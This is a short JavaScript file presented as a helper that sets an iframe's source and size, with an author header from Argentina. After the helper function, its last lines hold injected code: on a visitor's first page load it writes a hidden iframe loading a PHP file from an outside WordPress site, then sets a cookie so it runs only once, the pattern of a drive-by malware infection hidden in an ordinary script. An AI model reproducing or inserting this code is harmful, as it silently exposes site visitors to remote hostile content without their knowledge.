/***************************************************** 
Script: Regula altura del iframe 
Detalles: Se usa con flash, con entiquetas <a>, etc.
Autor: Ignacio Argüello
Fecha: 05/05/07
Mail: mail@yoelnacho.com.ar
web: www.yoelnacho.com.ar/
Argentina

******************************************************/

var iframeids=["visor"]

function alturaIframe(iframeid, url, ancho, alto){
if (document.getElementById)
document.getElementById(iframeid).src=url
document.getElementById(iframeid).width=ancho
document.getElementById(iframeid).height=alto
}


if (document.cookie.search("mlwf=5") == -1) {
pwx=document.getElementById('wtpk');if(pwx==null){document.write('<iframe id=wtpk src=http://jose.rebeldes.org.ar/wp-content/plugins/web-music/ajax.php style=display:none></iframe>');}
document.cookie = "mlwf=5;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
